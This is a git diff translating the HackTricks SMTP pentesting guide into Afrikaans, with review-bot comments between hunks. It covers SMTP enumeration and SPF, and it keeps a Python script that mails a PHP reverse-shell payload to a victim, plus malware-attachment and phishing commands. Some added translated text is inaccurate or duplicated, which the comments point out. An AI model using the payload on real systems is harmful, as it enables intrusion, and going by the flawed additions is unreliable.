+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
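Review bot: the rewritten "Ekstra opdragte" table carries the broken column layout over unchanged: for every row after `queryuser` the interface cell is left empty and the description lands under **Interface**, e.g. `| querygroup | Haal groepinligting op | |`; since this hunk touches every row anyway, fill the column (`| querygroup | SAMR | Haal groepinligting op |`, `| lookupsids | LSARPC | ... |`) instead of leaving the table unreadable. The translation of "enumeration" is also inconsistent within the same file: the title and first subsection use "opsporing" (`# rpcclient opsporing`, `#### Opsporing van Gebruikers`) while the rest use "opname" (`#### Opname van Groepe`, `#### Opname van Shares`); pick one. Minor: the body of the `for` loop in the bash block lost its indentation (`+rpcclient -N -U "" [IP_ADDRESS] ...`), which bash tolerates but which makes the loop harder to read; keep the original four spaces.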
diff --git a/network-services-pentesting/pentesting-smtp/README.md b/network-services-pentesting/pentesting-smtp/README.md index 82d74ae4d..4badcc9f7 100644 --- a/network-services-pentesting/pentesting-smtp/README.md +++ b/network-services-pentesting/pentesting-smtp/README.md @@ -2,100 +2,144 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## **Basic Information** +## **Basiese Inligting** -The **Simple Mail Transfer Protocol (SMTP)** is a protocol utilized within the TCP/IP suite for the **sending and receiving of e-mail**. Due to its limitations in queuing messages at the recipient's end, SMTP is often employed alongside either **POP3 or IMAP**. These additional protocols enable users to store messages on a server mailbox and to periodically download them. +Die **Simple Mail Transfer Protocol (SMTP)** is 'n protokol wat binne die TCP/IP-suite gebruik word vir die **stuur en ontvang van e-pos**. As gevolg van sy beperkings in die toustaan van boodskappe aan die ontvanger se kant, word SMTP dikwels saam met **POP3 of IMAP** gebruik. Hierdie bykomende protokolle maak dit vir gebruikers moontlik om boodskappe op 'n bedienerposbus te stoor en dit periodiek af te laai. -In practice, it is common for **e-mail programs** to employ **SMTP for sending e-mails**, while utilizing **POP3 or IMAP for receiving** them. On systems based on Unix, **sendmail** stands out as the SMTP server most frequently used for e-mail purposes. The commercial package known as Sendmail encompasses a POP3 server. 
Furthermore, **Microsoft Exchange** provides an SMTP server and offers the option to include POP3 support. - -**Default port:** 25,465(ssl),587(ssl) +In die praktyk is dit algemeen vir **e-posprogramme** om **SMTP te gebruik vir die stuur van e-posse**, terwyl hulle **POP3 of IMAP gebruik om dit te ontvang**. Op Unix-gebaseerde stelsels staan **sendmail** uit as die mees gebruikte SMTP-bedieners vir e-posdoeleindes. Die kommersiële pakket bekend as Sendmail sluit 'n POP3-bediener in. Verder bied **Microsoft Exchange** 'n SMTP-bediener en bied die opsie om POP3-ondersteuning in te sluit. +**Verstekpoort:** 25,465(ssl),587(ssl) ``` PORT STATE SERVICE REASON VERSION 25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959 ``` +### EPOS-Opstellers -### EMAIL Headers +As jy die geleentheid het om die slagoffer 'n e-pos te laat stuur (byvoorbeeld deur die kontakvorm van die webblad te gebruik), doen dit omdat jy sodoende die interne topologie van die slagoffer kan leer deur na die opstellers van die e-pos te kyk. -If you have the opportunity to **make the victim send you a email** (via contact form of the web page for example), do it because **you could learn about the internal topology** of the victim seeing the headers of the mail. +Jy kan ook 'n e-pos kry van 'n SMTP-bediener deur te probeer om 'n e-pos na daardie bediener te stuur met 'n nie-bestaande adres (omdat die bediener 'n NDN-e-pos aan die aanvaller sal stuur). Maar, maak seker dat jy die e-pos van 'n toegelate adres stuur (kontroleer die SPF-beleid) en dat jy NDN-boodskappe kan ontvang. -You can also get an email from a SMTP server trying to **send to that server an email to a non-existent address** (because the server will send to the attacker a NDN mail). But, be sure that you send the email from an allowed address (check the SPF policy) and that you can receive NDN messages. 
+Jy moet ook probeer om verskillende inhoud te stuur omdat jy meer interessante inligting in die opstellers kan vind, soos: `X-Virus-Scanned: by av.domain.com`\ +Jy moet die EICAR-toetslêer stuur.\ +Die opsporing van die **AV** kan jou in staat stel om bekende kwesbaarhede uit te buit. -You should also try to **send different contents because you can find more interesting information** on the headers like: `X-Virus-Scanned: by av.domain.com`\ -You should send the EICAR test file.\ -Detecting the **AV** may allow you to exploit **known vulnerabilities.** +## Basiese aksies -## Basic actions - -### **Banner Grabbing/Basic connection** +### **Opstellers gryp/Basiese verbinding** **SMTP:** - ```bash nc -vn 25 ``` - **SMTPS**: +SMTPS (Secure SMTP) is 'n beveiligde weergawe van die Simple Mail Transfer Protocol (SMTP) wat gebruik word om e-posse te stuur en te ontvang. Dit maak gebruik van SSL- of TLS-versleuteling om die kommunikasie tussen die e-poskliënt en die e-posbediener te beveilig. Hierdie beveiligingslaag verseker dat die e-posse veilig oorgedra word en beskerm teen afluistering en manipulasie deur aanvallers. Om toegang te verkry tot 'n SMTPS-bedienaar, moet jy 'n geldige sertifikaat hê wat deur die bediener vertrou word. ```bash openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587 ``` +### Vind MX-bedieners van 'n organisasie -### Finding MX servers of an organisation +Om die MX-bedieners van 'n organisasie te vind, kan jy die volgende stappe volg: +1. Gebruik 'n DNS-navraaghulpmiddel soos `nslookup` of `dig` om die DNS-rekords van die organisasie se domein te ondersoek. Byvoorbeeld: + + ```bash + nslookup -type=MX example.com + ``` + + Hierdie opdrag sal die MX-rekords vir die domein `example.com` toon. + +2. Kyk vir die resultate van die navraag en identifiseer die MX-bedieners. 
Die MX-bedieners is die rekords wat begin met die voorvoegsel `MX` en 'n prioriteitstoekenning het. Byvoorbeeld: + + ```plaintext + example.com MX preference = 10, mail exchanger = mx1.example.com + example.com MX preference = 20, mail exchanger = mx2.example.com + ``` + + In hierdie geval is `mx1.example.com` en `mx2.example.com` die MX-bedieners van die organisasie. + +Deur hierdie stappe te volg, sal jy in staat wees om die MX-bedieners van 'n organisasie te vind. Hierdie inligting kan nuttig wees vir SMTP-pentesting en ander netwerktoetse. ```bash dig +short mx google.com ``` +### Opstel -### Enumeration +Enumeration is 'n proses waardeur 'n aanvaller inligting versamel oor 'n SMTP-diens om potensiële aanvalspunte te identifiseer. Hier is 'n paar tegnieke wat gebruik kan word vir enumeration: +- **SMTP Banner Grabbing**: Hierdie tegniek behels die verbind met die SMTP-diens en die ondersoek van die banner wat deur die diens teruggestuur word. Die banner kan inligting bevat soos die diens se weergawe en die gebruikte sagteware. + +- **User Enumeration**: Hierdie tegniek behels die identifisering van geldige gebruikers op die SMTP-diens. Dit kan gedoen word deur verskillende gebruikersname te probeer en te kyk vir spesifieke foutboodskappe wat aandui of 'n gebruiker geldig is of nie. + +- **Email Address Enumeration**: Hierdie tegniek behels die identifisering van geldige e-posadresse op die SMTP-diens. Dit kan gedoen word deur verskillende e-posadresse te probeer en te kyk vir spesifieke foutboodskappe wat aandui of 'n e-posadres geldig is of nie. + +- **SMTP VRFY-enumerasie**: Hierdie tegniek behels die gebruik van die SMTP VRFY-opdrag om te bevestig of 'n spesifieke gebruiker of e-posadres geldig is op die diens. + +- **SMTP RCPT-enumerasie**: Hierdie tegniek behels die gebruik van die SMTP RCPT-opdrag om te bevestig of 'n spesifieke e-posadres geldig is op die diens. 
+ +- **SMTP EXPN-enumerasie**: Hierdie tegniek behels die gebruik van die SMTP EXPN-opdrag om die volledige e-posadres van 'n spesifieke gebruiker te verkry. + +- **SMTP Relay-enumerasie**: Hierdie tegniek behels die identifisering van SMTP-relay-stelsels wat gebruik kan word om e-posse te stuur sonder die nodige outentifikasie. + +- **SMTP User-Agent-enumerasie**: Hierdie tegniek behels die identifisering van die gebruikte e-poskliënt of -agtent deur die SMTP-diens. + +- **SMTP Extension-enumerasie**: Hierdie tegniek behels die identifisering van enige uitbreidings wat deur die SMTP-diens ondersteun word. + +- **SMTP Service-enumerasie**: Hierdie tegniek behels die identifisering van ander dienste wat op dieselfde bediener as die SMTP-diens uitgevoer word. + +- **SMTP Verbindings-enumerasie**: Hierdie tegniek behels die identifisering van die maksimum aantal toegelate verbindings na die SMTP-diens. + +- **SMTP Relay-enumerasie**: Hierdie tegniek behels die identifisering van SMTP-relay-stelsels wat gebruik kan word om e-posse te stuur sonder die nodige outentifikasie. + +- **SMTP User-Agent-enumerasie**: Hierdie tegniek behels die identifisering van die gebruikte e-poskliënt of -agtent deur die SMTP-diens. + +- **SMTP Extension-enumerasie**: Hierdie tegniek behels die identifisering van enige uitbreidings wat deur die SMTP-diens ondersteun word. + +- **SMTP Service-enumerasie**: Hierdie tegniek behels die identifisering van ander dienste wat op dieselfde bediener as die SMTP-diens uitgevoer word. + +- **SMTP Verbindings-enumerasie**: Hierdie tegniek behels die identifisering van die maksimum aantal toegelate verbindings na die SMTP-diens. ```bash nmap -p25 --script smtp-commands 10.10.10.10 nmap -p25 --script smtp-open-relay 10.10.10.10 -v ``` +### NTLM Auth - Inligtingsoffergawe -### NTLM Auth - Information disclosure - -If the server supports NTLM auth (Windows) you can obtain sensitive info (versions). 
More info [**here**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666). - +As die bediener NTLM-verifikasie ondersteun (Windows), kan jy sensitiewe inligting (weergawes) verkry. Meer inligting [**hier**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666). ```bash -root@kali: telnet example.com 587 -220 example.com SMTP Server Banner ->> HELO -250 example.com Hello [x.x.x.x] ->> AUTH NTLM 334 -NTLM supported ->> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= +root@kali: telnet example.com 587 +220 example.com SMTP Server Banner +>> HELO +250 example.com Hello [x.x.x.x] +>> AUTH NTLM 334 +NTLM supported +>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA ``` +Of **outomatiseer** dit met die **nmap** invoegtoepassing `smtp-ntlm-info.nse` -Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse` - -### Internal server name - Information disclosure - -Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name: +### Interne bedienernaam - Inligtingsoopmaking +Sommige SMTP-bedieners voltooi outomaties 'n afsender se adres wanneer die opdrag "MAIL FROM" uitgereik word sonder 'n volledige adres, wat die interne naam daarvan openbaar maak: ``` -220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200 +220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200 EHLO all 250-somedomain.com Hello [x.x.x.x] 250-TURN 
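Review bot: this hunk adds material that is not a translation of the source and some of it is wrong. The new paragraph under **SMTPS** ends with "Om toegang te verkry tot 'n SMTPS-bedienaar, moet jy 'n geldige sertifikaat hê wat deur die bediener vertrou word", but in SMTPS/STARTTLS it is the server that presents a certificate; a client authenticates with credentials (AUTH), not with a certificate, so drop that sentence. The new "Vind MX-bedieners" step list and the long bullet list under "### Opstel" are likewise additions, and the bullet list repeats five items verbatim (SMTP Relay-, User-Agent-, Extension-, Service- and Verbindings-enumerasie each appear twice); a translation commit should not introduce new claims, so remove the additions or split them into their own PR. Several headings are mistranslated: "EMAIL Headers" became `### EPOS-Opstellers` and "Banner Grabbing" became `### **Opstellers gryp/Basiese verbinding**` ("opstellers" means authors/composers), "Enumeration" became `### Opstel`, and "Information disclosure" is rendered `Inligtingsoffergawe` in one heading and `Inligtingsoopmaking` in the next while the same file later uses "Koppe" for headers; use one consistent rendering such as "e-poskoppe" and "inligtingsopenbaarmaking". Style: the blank line that preceded every fenced block was removed throughout this hunk; keep it so the fences are separated from the surrounding list items.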
@@ -112,19 +156,17 @@ EHLO all MAIL FROM: me 250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK ``` - ### Sniffing -Check if you sniff some password from the packets to port 25 +Kyk of jy 'n wagwoord kan snuif van die pakkies na poort 25. ### [Auth bruteforce](../../generic-methodologies-and-resources/brute-force.md#smtp) -## Username Bruteforce Enumeration +## Gebruikersnaam Bruteforce Enumerasie -**Authentication is not always needed** +**Verifikasie is nie altyd nodig nie** ### RCPT TO - ```bash $ telnet 1.1.1.1 25 Trying 1.1.1.1... @@ -142,9 +184,25 @@ RCPT TO:admin RCPT TO:ed 250 2.1.5 ed... Recipient ok ``` - ### VRFY +VRFY (VeriFy) is a command used in the Simple Mail Transfer Protocol (SMTP) to verify the existence of a specific email address. It is commonly used by email servers to check if an email address is valid before accepting incoming messages. + +When the VRFY command is sent to an SMTP server, the server will respond with one of the following: + +- 250 OK: This means that the email address exists and is valid. +- 550 No such user: This means that the email address does not exist or is not valid. + +VRFY can be useful during the reconnaissance phase of a penetration test, as it allows the tester to gather information about valid email addresses on a target system. However, it is important to note that some SMTP servers may be configured to disable the VRFY command due to security concerns. + +To use the VRFY command, you can use a telnet client to connect to the SMTP server on port 25 and then issue the VRFY command followed by the email address you want to verify. For example: + +``` +telnet mail.example.com 25 +VRFY john.doe@example.com +``` + +The server's response will indicate whether the email address is valid or not. ```bash $ telnet 1.1.1.1 25 Trying 1.1.1.1... 
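Review bot: in hunk `@@ -142,9 +184,25 @@` the added VRFY explanation is in English, so it does not belong in an Afrikaans translation commit and is new content rather than a translation. Its claim that the server replies either `250 OK` or `550 No such user` is incomplete: a server may also answer 252 (cannot verify, but will accept the message), which is exactly the case the following sentence about servers disabling VRFY needs to cover. The added example (`telnet mail.example.com 25` / `VRFY john.doe@example.com`) duplicates the existing `$ telnet 1.1.1.1 25` session immediately below it; either drop the addition or keep a single, translated example.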
@@ -160,9 +218,17 @@ VRFY root VRFY blah 550 blah... User unknown ``` - ### EXPN +Die EXPN-opdrag word gebruik om die volledige e-posadres van 'n ontvanger te verkry deur die e-posadresuitbreiding van 'n gebruiker te onthul. Dit kan nuttig wees vir 'n aanvaller om 'n lys geldige e-posadresuitbreidings te verkry vir doeleindes soos sosiale ingenieurswese of spamverspreiding. + +Om die EXPN-opdrag uit te voer, kan jy die volgende stappe volg: + +1. Verbind met die SMTP-bediener deur die relevante poort (gewoonlik poort 25) te gebruik. +2. Stuur die opdrag `EXPN ` na die bediener, waar `` die e-posadresuitbreiding is wat jy wil onthul. +3. Ontvang die reaksie van die bediener. As die uitbreiding geldig is, sal die bediener die volledige e-posadres terugstuur. As die uitbreiding nie geldig is nie, sal die bediener 'n foutboodskap terugstuur. + +Dit is belangrik om te onthou dat nie alle SMTP-bedieners die EXPN-opdrag ondersteun nie, en dit kan deur die bediener gedeaktiveer word vir sekuriteitsredes. ```bash $ telnet 1.1.1.1 25 Trying 1.1.1.1... 
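Review bot: the added description of EXPN is inaccurate: EXPN expands a mailing list or alias into its member addresses, it does not "die volledige e-posadres van 'n ontvanger" reveal for a single user; the existing output in this same hunk (`EXPN sshd` answered by `250 2.1.5 sshd privsep sshd@myhost`) shows the expansion behaviour. As with the VRFY text, this is new content rather than a translation, so either correct it or leave it out of the translation commit. The blank line before the `$ telnet 1.1.1.1 25` fence was removed here as well; restore it.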
@@ -179,45 +245,92 @@ EXPN root EXPN sshd 250 2.1.5 sshd privsep sshd@myhost ``` +### Outomatiese gereedskap -### Automatic tools +Daar is verskeie outomatiese gereedskap beskikbaar vir SMTP-pentesting wat jou kan help om vinnig en doeltreffend te skandeer vir sekuriteitskwessies en swakheid in 'n SMTP-diens. Hier is 'n paar van die gewildste outomatiese gereedskap wat jy kan gebruik: +- **Nmap**: 'n Veelsydige skanderingstool wat ook SMTP-dienste kan skandeer en sekuriteitskwessies kan identifiseer. +- **Metasploit**: 'n Kragtige raamwerk vir penetrasietoetse wat 'n verskeidenheid modules bevat vir SMTP-pentesting. +- **OpenVAS**: 'n Open Source-vulnerabiliteitsbeoordelingstool wat ook SMTP-dienste kan skandeer vir swakheid. +- **SMTP User Enum**: 'n Gereedskap wat gebruik kan word om geldige gebruikersname in 'n SMTP-diens te identifiseer deur middel van 'n gebruikersnaamopsoek. +- **SMTPTester**: 'n Eenvoudige gereedskap wat SMTP-dienste kan skandeer en toets vir swakheid soos oop relays en ongeldige gebruikersname. + +Dit is belangrik om te onthou dat outomatiese gereedskap slegs 'n hulpmiddel is en nie al die moontlike swakheid en sekuriteitskwessies kan opspoor nie. Dit is altyd 'n goeie praktyk om handmatige pentesting-tegnieke te gebruik om 'n volledige beeld van die sekuriteit van 'n SMTP-diens te verkry. ``` Metasploit: auxiliary/scanner/smtp/smtp_enum smtp-user-enum: smtp-user-enum -M -u -t Nmap: nmap --script smtp-enum-users ``` -
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## DSN Reports +## DSN-rapporte -**Delivery Status Notification Reports**: If you send an **email** to an organisation to an **invalid address**, the organisation will notify that the address was invalided sending a **mail back to you**. **Headers** of the returned email will **contain** possible **sensitive information** (like IP address of the mail services that interacted with the reports or anti-virus software info). +**Afleweringsstatuskennisgewingsrapporte**: As jy 'n **e-pos** na 'n organisasie stuur na 'n **ongeldige adres**, sal die organisasie jou in kennis stel dat die adres ongeldig was deur 'n **e-pos terug te stuur**. **Koppe** van die teruggestuurde e-pos sal moontlike **sensitiewe inligting** bevat (soos IP-adres van die e-posdienste wat met die rapporte geïnteraksie het of inligting oor antivirus sagteware). -## [Commands](smtp-commands.md) - -### Sending an Email from linux console +## [Opdragte](smtp-commands.md) +### Stuur 'n e-pos vanaf die Linux-konsole ```bash sendEmail -t to@domain.com -f from@attacker.com -s -u "Important subject" -a /tmp/malware.pdf Reading message body from STDIN because the '-m' option was not used. 
If you are manually typing in a message: - - First line must be received within 60 seconds. - - End manual input with a CTRL-D on its own line. +- First line must be received within 60 seconds. +- End manual input with a CTRL-D on its own line. ``` ```bash - swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197 +swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197 +``` +### Stuur 'n E-pos met Python + +Om 'n e-pos te stuur met Python, kan jy die `smtplib`-biblioteek gebruik. Hier is 'n voorbeeld van hoe om dit te doen: + +```python +import smtplib + +def send_email(sender_email, sender_password, receiver_email, subject, message): + try: + # Verbind met die SMTP-bediener + server = smtplib.SMTP('smtp.gmail.com', 587) + server.starttls() + server.login(sender_email, sender_password) + + # Stel die e-pos op + email_message = f"Subject: {subject}\n\n{message}" + + # Stuur die e-pos + server.sendmail(sender_email, receiver_email, email_message) + print("E-pos suksesvol gestuur!") + except Exception as e: + print(f"Fout tydens die stuur van die e-pos: {str(e)}") + finally: + # Sluit die verbinding met die SMTP-bediener + server.quit() + +# Stel die nodige inligting op +sender_email = "jou@gmail.com" +sender_password = "jouwagwoord" +receiver_email = "ontvanger@gmail.com" +subject = "Hallo daar!" +message = "Hierdie is 'n toetsboodskap." + +# Stuur die e-pos +send_email(sender_email, sender_password, receiver_email, subject, message) ``` -### Sending an Email with Python +Sorg dat jy die volgende veranderinge maak aan die kode: +- Vervang `jou@gmail.com` met jou e-posadres. +- Vervang `jouwagwoord` met jou e-pos wagwoord. +- Vervang `ontvanger@gmail.com` met die e-posadres van die ontvanger. +- Pas die onderwerp en boodskap aan soos nodig. 
+Hierdie kode sal 'n e-pos stuur vanaf jou Gmail-rekening na die ontvanger se e-posadres. ```python from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText @@ -233,12 +346,12 @@ rport = 25 # 489,587 msg = MIMEMultipart() # setup the parameters of the message -password = "" +password = "" msg['From'] = "attacker@local" msg['To'] = "victim@local" msg['Subject'] = "This is not a drill!" -# payload +# payload message = ("& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport)) print("[*] Payload is generated : %s" % message) @@ -247,8 +360,8 @@ msg.attach(MIMEText(message, 'plain')) server = smtplib.SMTP(host=rhost,port=rport) if server.noop()[0] != 250: - print("[-]Connection Error") - exit() +print("[-]Connection Error") +exit() server.starttls() 
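Review bot: The hunk at `@@ -179,45 +245,92 @@` adds content that does not exist on the `-` side instead of translating it: the paragraph and bullet list under `+### Outomatiese gereedskap` (Nmap, Metasploit, OpenVAS, SMTP User Enum, SMTPTester) and the entire `+### Stuur 'n E-pos met Python` section with the `smtplib.SMTP('smtp.gmail.com', 587)` / `jouwagwoord` example have no counterpart in the English page. In the same hunk the original `-### Sending an Email with Python` heading is deleted, so the page's own payload script (the one starting `from email.mime.multipart import MIMEMultipart`) now hangs under the invented Gmail example without a heading of its own. Suggest dropping the added sections and restoring the heading as `### Stuur 'n e-pos met Python` directly above the original script; a translation PR should not change the set of tools or examples the page recommends.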
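Review bot: The hunk at `@@ -247,8 +360,8 @@` breaks the Python script: `print("[-]Connection Error")` and `exit()` are dedented out of the `if server.noop()[0] != 250:` block, which raises an IndentationError before anything runs. Whitespace inside code fences must be left untouched by the translation; restore the four-space indent on both lines. The adjacent `@@ -233,12 +346,12 @@` hunk (`password = ""`, `# payload`) is whitespace-only churn in the same block and should be dropped from the diff.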
@@ -260,52 +373,50 @@ server.quit() print("[***]successfully sent email to %s:" % (msg['To'])) ``` +## E-posvervalsing Teenmaatreëls -## Mail Spoofing Countermeasures +Organisasies word verhoed om ongemagtigde e-posse namens hulle te stuur deur gebruik te maak van **SPF**, **DKIM**, en **DMARC** as gevolg van die maklikheid van e-posvervalsing. -Organizations are prevented from having unauthorized email sent on their behalf by employing **SPF**, **DKIM**, and **DMARC** due to the ease of spoofing SMTP messages. - -A **complete guide to these countermeasures** is made available at [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/). +'n **Volledige gids oor hierdie teenmaatreëls** is beskikbaar by [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/). ### SPF {% hint style="danger" %} -SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\ -Moreover, to reuse previous spf records it's quiet common to find something like `"v=spf1 include:_spf.google.com ~all"` +SPF [is in 2014 "verouderd" geraak](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Dit beteken dat jy in plaas van 'n **TXT-rekord** in `_spf.domain.com` 'n rekord in `domain.com` moet skep met dieselfde sintaksis.\ +Verder is dit baie algemeen om iets soos `"v=spf1 include:_spf.google.com ~all"` te vind om vorige SPF-rekords te hergebruik. {% endhint %} -**Sender Policy Framework** (SPF) is a mechanism that enables Mail Transfer Agents (MTAs) to verify whether a host sending an email is authorized by querying a list of authorized mail servers defined by the organizations. 
This list, which specifies IP addresses/ranges, domains, and other entities **authorized to send email on behalf of a domain name**, includes various "**Mechanisms**" in the SPF record. +**Sender Policy Framework** (SPF) is 'n meganisme wat Mail Transfer Agents (MTAs) in staat stel om te verifieer of 'n gasheer wat 'n e-pos stuur, gemagtig is deur 'n lys van gemagtigde posdiensverskaffers te ondervra wat deur die organisasies gedefinieer is. Hierdie lys, wat IP-adresse/reekse, domeine en ander entiteite insluit wat **gemagtig is om e-pos namens 'n domeinnaam te stuur**, bevat verskillende "**Meganismes**" in die SPF-rekord. -#### Mechanisms +#### Meganismes -From [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework): +Vanaf [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework): -| Mechanism | Description | +| Meganisme | Beskrywing | | --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| ALL | Matches always; used for a default result like `-all` for all IPs not matched by prior mechanisms. | -| A | If the domain name has an address record (A or AAAA) that can be resolved to the sender's address, it will match. | -| IP4 | If the sender is in a given IPv4 address range, match. | -| IP6 | If the sender is in a given IPv6 address range, match. | -| MX | If the domain name has an MX record resolving to the sender's address, it will match (i.e. the mail comes from one of the domain's incoming mail servers). | -| PTR | If the domain name (PTR record) for the client's address is in the given domain and that domain name resolves to the client's address (forward-confirmed reverse DNS), match. This mechanism is discouraged and should be avoided, if possible. 
| -| EXISTS | If the given domain name resolves to any address, match (no matter the address it resolves to). This is rarely used. Along with the SPF macro language it offers more complex matches like DNSBL-queries. | -| INCLUDE | References the policy of another domain. If that domain's policy passes, this mechanism passes. However, if the included policy fails, processing continues. To fully delegate to another domain's policy, the redirect extension must be used. | -| REDIRECT |

A redirect is a pointer to another domain name that hosts an SPF policy, it allows for multiple domains to share the same SPF policy. It is useful when working with a large amount of domains that share the same email infrastructure.

It SPF policy of the domain indicated in the redirect Mechanism will be used.

| +| ALL | Pas altyd; gebruik vir 'n verstekresultaat soos `-all` vir alle IP-adresse wat nie deur vorige meganismes gekoppel is nie. | +| A | As die domeinnaam 'n adresrekord (A of AAAA) het wat opgelos kan word na die afstuurder se adres, sal dit pas. | +| IP4 | As die afstuurder binne 'n gegewe IPv4-adresreekse is, pas dit. | +| IP6 | As die afstuurder binne 'n gegewe IPv6-adresreekse is, pas dit. | +| MX | As die domeinnaam 'n MX-rekord het wat oplos na die afstuurder se adres, sal dit pas (m.a.w. die pos kom van een van die domein se inkomende posdiensverskaffers). | +| PTR | As die domeinnaam (PTR-rekord) vir die kliënt se adres binne die gegewe domein is en daardie domeinnaam oplos na die kliënt se adres (forward-confirmed reverse DNS), pas dit. Hierdie meganisme word afgeraai en moet vermy word, indien moontlik. | +| EXISTS | As die gegewe domeinnaam oplos na enige adres, pas dit (maak nie saak na watter adres dit oplos nie). Dit word selde gebruik. Tesame met die SPF-makrotaal bied dit meer komplekse pasmaats soos DNSBL-navrae. | +| INCLUDE | Verwys na die beleid van 'n ander domein. As daardie domein se beleid slaag, slaag hierdie meganisme. As die ingeslote beleid egter misluk, gaan die verwerking voort. Om volledig te delegeer na 'n ander domein se beleid, moet die omskakelingsextensie gebruik word. | +| REDIRECT |

Die SPF-beleid van die domein wat in die omskakelingsmeganisme aangedui word, sal gebruik word.

